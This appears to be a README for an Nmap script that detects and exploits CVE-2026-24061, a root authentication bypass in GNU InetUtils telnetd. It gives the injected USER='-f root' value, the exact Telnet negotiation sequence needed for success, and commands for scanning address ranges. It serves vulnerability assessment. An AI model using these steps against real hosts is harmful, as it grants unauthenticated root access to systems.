## https://sploitus.com/exploit?id=050660E6-A5E0-5EA8-B624-03701B9D145F
# CVE-2026-24061 โ GNU InetUtils telnetd Authentication Bypass
## Nmap NSE Detection Script
[](https://nmap.org/nsedoc/)
[](https://nvd.nist.gov/vuln/detail/CVE-2026-24061)
[](https://nvd.nist.gov/vuln/detail/CVE-2026-24061)
[](https://nmap.org/book/man-legal.html)
---
## Overview
This Nmap NSE script detects **CVE-2026-24061**, an authentication bypass vulnerability
in **GNU InetUtils telnetd** versions **1.9.3 through 2.7**.
By sending a crafted `USER` environment variable of the form `-f ` during
Telnet option negotiation, an unauthenticated attacker can obtain a shell with the
privileges of the specified local user โ including `root` โ **without providing any
password**.
> **Intended Use:** Authorized penetration testing and vulnerability assessment only.
> Running this script against systems without explicit written permission is illegal.
---
## Vulnerability Details
| Field | Value |
|-----------------|-----------------------------------------------|
| CVE ID | CVE-2026-24061 |
| Affected | GNU InetUtils telnetd 1.9.3 โ 2.7 |
| CVSSv3 Score | **9.8 Critical** |
| Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| Type | Authentication Bypass (CWE-287) |
| Disclosure | 2026-01-01 |
### How it works
GNU InetUtils `telnetd` uses the Telnet **NEW-ENVIRON** option (RFC 1572) to receive
environment variables from the client during the negotiation phase. The `login(1)`
program is then invoked with those variables.
The vulnerability arises because `telnetd` passes the `USER` variable directly to
`login` without sanitising it. The `login` program on Linux accepts a `-f `
flag meaning *"pre-authenticated, do not check password"*. By injecting
`USER="-f root"` via the NEW-ENVIRON payload, the attacker bypasses authentication
entirely.
```
Client โ Server: IAC SB NEW-ENVIRON IS VAR "USER" VALUE "-f root" IAC SE
Server response: spawns login -f root โ root shell, no password required
```
---
## Script Details
| Field | Value |
|-------------|----------------------------------------------------|
| Filename | `telnet-vuln-cve-2026-24061.nse` |
| Categories | `vuln`, `exploit`, `intrusive` |
| Port | TCP/23 (telnet) |
| Tested on | Nmap 7.94 / 7.98, Windows & Linux |
### Detection Method
The script performs a **full Telnet negotiation** mirroring the exact byte sequence
of a real `telnet -a` client session (reconstructed from Wireshark capture):
1. Receive server's opening IAC burst (`DO TTYPE`, `DO TSPEED`, `DO ENVIRON`, โฆ)
2. Reply with complete client capability announcement (`WILL TTYPE`, `WILL LINEMODE`, โฆ)
3. Complete sub-negotiation round (`SB TSPEED`, `SB ENVIRON`, `SB TTYPE`)
4. Inject crafted `USER='-f '` in the NEW-ENVIRON IS payload
5. Complete the `WILL ECHO` / `DO BINARY` / **`WONT LINEMODE`** sequence
*(critical โ without this, telnetd cannot finalise PTY setup)*
6. Check whether the server sends a login shell prompt **without** a password challenge
**Result states:**
| State | Meaning |
|------------------|----------------------------------------------------------------|
| `EXPLOIT` | Shell prompt received โ bypass confirmed |
| `LIKELY_VULN` | ENV payload accepted, no password prompt, but no shell prompt |
| `NOT_VULN` | Password prompt seen, or negotiation did not complete |
---
## Installation
### Linux
```bash
# Copy to Nmap scripts directory
sudo cp telnet-vuln-cve-2026-24061.nse /usr/share/nmap/scripts/
# Update script database
sudo nmap --script-updatedb
```
### Windows
```cmd
# Copy to Nmap scripts directory (adjust path if needed)
copy telnet-vuln-cve-2026-24061.nse "C:\Program Files (x86)\Nmap\scripts\"
# Update script database (run as Administrator)
nmap --script-updatedb
```
---
## Usage
### Basic scan (default user: root)
```bash
nmap -p 23 --script telnet-vuln-cve-2026-24061
```
### Specify a different user
```bash
# Short form
nmap -p 23 --script telnet-vuln-cve-2026-24061 --script-args user=kali
# Medium form
nmap -p 23 --script telnet-vuln-cve-2026-24061 --script-args telnet-user=kali
# Fully qualified
nmap -p 23 --script telnet-vuln-cve-2026-24061 \
--script-args telnet-vuln-cve-2026-24061.user=kali
```
### Scan an IP range
```bash
nmap -p 23 --script telnet-vuln-cve-2026-24061 192.168.1.0/24
```
### Verbose / Debug output
```bash
nmap -p 23 --script telnet-vuln-cve-2026-24061 -v # verbose
nmap -p 23 --script telnet-vuln-cve-2026-24061 -d # debug
nmap -p 23 --script telnet-vuln-cve-2026-24061 -d2 # full hex trace
```
---
## Sample Output
### Vulnerable host
```
PORT STATE SERVICE
23/tcp open telnet
| telnet-vuln-cve-2026-24061:
| VULNERABLE:
| GNU InetUtils telnetd Authentication Bypass
| State: VULNERABLE (Exploitable)
| IDs: CVE:CVE-2026-24061
| Risk factor: Critical CVSSv3: 9.8
| Description:
| The telnetd service in GNU InetUtils (1.9.3 - 2.7) allows
| authentication bypass via a crafted USER environment variable.
| Sending '-f ' results in an unauthenticated login shell.
| Extra information:
| Authentication bypassed: shell prompt received after injecting
| USER='-f root' -- no password challenge was presented.
| References:
| https://nvd.nist.gov/vuln/detail/CVE-2026-24061
| https://github.com/JayGLXR/CVE-2026-24061-POC
|_ https://github.com/SafeBreach-Labs/CVE-2026-24061
```
### Not vulnerable host
```
PORT STATE SERVICE
23/tcp open telnet
```
*(no script output โ NOT_VULN is silent by design, standard Nmap convention)*
---
## Script Arguments
| Argument | Alias(es) | Default | Description |
|---------------------------------------|------------------------|---------|------------------------------|
| `telnet-vuln-cve-2026-24061.user` | `telnet-user`, `user` | `root` | Username to inject via `-f` |
---
## Technical Notes
### Why WONT LINEMODE is critical
GNU InetUtils `telnetd` uses the Linemode negotiation (RFC 1184) to determine the
terminal I/O mode. The server sends `DO LINEMODE` early in negotiation, and the
client initially responds `WILL LINEMODE`. After the ENV payload exchange, the server
sends `WILL ECHO` followed by `DO BINARY`. At this point the client **must** respond
with `WONT LINEMODE` to signal character-at-a-time mode โ only then can `telnetd`
complete PTY setup (`ioctl TIOCSWINSZ`) and fork `login`. Without this step, the
server logs `peer died: Inappropriate ioctl for device` and drops the connection.
### NSE Socket API
Nmap's NSE socket API differs from standard Lua socket conventions:
```lua
-- Nmap NSE (correct):
local status, data = sock:receive_bytes(1)
if status == true then -- data is the received string
```
---
## References
- [NVD โ CVE-2026-24061](https://nvd.nist.gov/vuln/detail/CVE-2026-24061)
- [PoC by JayGLXR](https://github.com/JayGLXR/CVE-2026-24061-POC)
- [PoC by SafeBreach-Labs](https://github.com/SafeBreach-Labs/CVE-2026-24061)
- [RFC 1572 โ NEW-ENVIRON](https://www.rfc-editor.org/rfc/rfc1572)
- [RFC 1184 โ Linemode](https://www.rfc-editor.org/rfc/rfc1184)
- [Nmap NSE Documentation](https://nmap.org/book/nse.html)
---
## Disclaimer
This script is provided for **authorized security testing and research purposes only**.
The author is not responsible for any misuse or damage caused by this tool.
Always obtain explicit written permission before testing systems you do not own.